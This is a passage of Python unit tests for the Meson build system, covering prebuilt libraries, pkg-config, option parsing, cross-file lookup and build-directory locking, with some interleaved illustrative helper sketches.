'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
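# Detect the host C compiler, static linker, and the platform's object and
# shared-library suffixes, for tests that prebuild artifacts by hand.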
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
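# Compile a single source file to an object file by invoking the compiler
# directly: /Fo + /c for MSVC-style syntax, -c + -o for GCC-style.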
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
# Build the archive command from the detected static linker so the same
# code covers both msvc 'lib'-style and 'ar'-style tools.
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
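# Link a shared library by hand: MSVC-style needs /DLL and an import lib;
# GCC-style needs -shared, -fPIC (except on Windows/Cygwin/macOS) and,
# outside macOS, an explicit -Wl,-soname.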
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build.
Also test that it's not a hard error to have unsatisfiable library deps,
since system libraries like -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
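# Assert that the introspected build options contain 'name' with exactly 'value'.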
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang == 'java':
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
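# The try/except ladder above could be written data-driven; a sketch,
# assuming only the detect_* methods already used above (illustration,
# not meson's code):
def probe_optional_languages(env, machine):
    langs = []
    probes = [
        ('cpp', env.detect_cpp_compiler),
        ('cs', env.detect_cs_compiler),
        ('d', env.detect_d_compiler),
        ('java', env.detect_java_compiler),
        ('cuda', env.detect_cuda_compiler),
        ('fortran', env.detect_fortran_compiler),
        ('objc', env.detect_objc_compiler),
        ('objcpp', env.detect_objcpp_compiler),
    ]
    for lang, detect in probes:
        try:
            detect(machine)  # raises EnvironmentException if not found
            langs.append(lang)
        except EnvironmentException:
            pass
    return langs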
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
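# A hedged sketch of the lookup order this test exercises (illustration,
# not meson's implementation): cross files are searched under
# XDG_DATA_HOME (falling back to ~/.local/share) and then each entry of
# XDG_DATA_DIRS, each with a meson/cross suffix.
import os

def cross_file_candidates(name):
    bases = [os.environ.get('XDG_DATA_HOME') or os.path.expanduser('~/.local/share')]
    bases += (os.environ.get('XDG_DATA_DIRS') or '').split(':')
    return [os.path.join(b, 'meson', 'cross', name) for b in bases if b]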
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
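# A hedged, POSIX-only sketch of the double-locking failure asserted
# above (BuildDirLock's actual implementation is not shown here): a
# second non-blocking flock on the same file fails while the first
# handle is open.
import fcntl

def acquire_build_lock(path):
    f = open(path, 'w')
    try:
        fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)  # raises OSError if already held
    except OSError:
        f.close()
        raise
    return f  # keep the handle open to hold the lock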
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
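# The rule the two tests above pin down for b_ndebug=if-release, as a
# sketch; whether any buildtype other than 'release' counts is an
# assumption not asserted by these tests.
def ndebug_defined(buildtype, b_ndebug):
    if b_ndebug == 'if-release':
        return buildtype == 'release'
    return b_ndebug == 'true'

assert ndebug_defined('release', 'if-release') is True
assert ndebug_defined('debugoptimized', 'if-release') is False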
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# Static libraries are not linkable with -l under msvc because meson
# installs them as .a files, which unix_args_to_native does not recognize
# since it expects libraries to use the .lib extension. For a DLL the
# import library is installed as .lib. Thus for msvc this test needs to
# use shared libraries to exercise the path-resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_installdir
self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
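# All six tests above assert the same "last value wins" rule for
# repeated options. A standalone restatement (sketch, not meson's
# parser):
def parse_d_args(args):
    opts = {}
    for a in args:
        if a.startswith('-D') and '=' in a:
            key, _, value = a[2:].partition('=')
            opts[key] = value  # a later occurrence overwrites an earlier one
    return opts

assert parse_d_args(['-Dbindir=foo', '-Dbindir=bar'])['bindir'] == 'bar'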
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set a wrong option for an unknown subproject or
# language because we have no control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that do not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 and earlier versions.
pass
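# The -Dc_args assertions above follow POSIX-style quoting; shlex.split
# is a close stand-in for meson's split_args on such command lines
# (approximation, not the actual implementation):
import shlex

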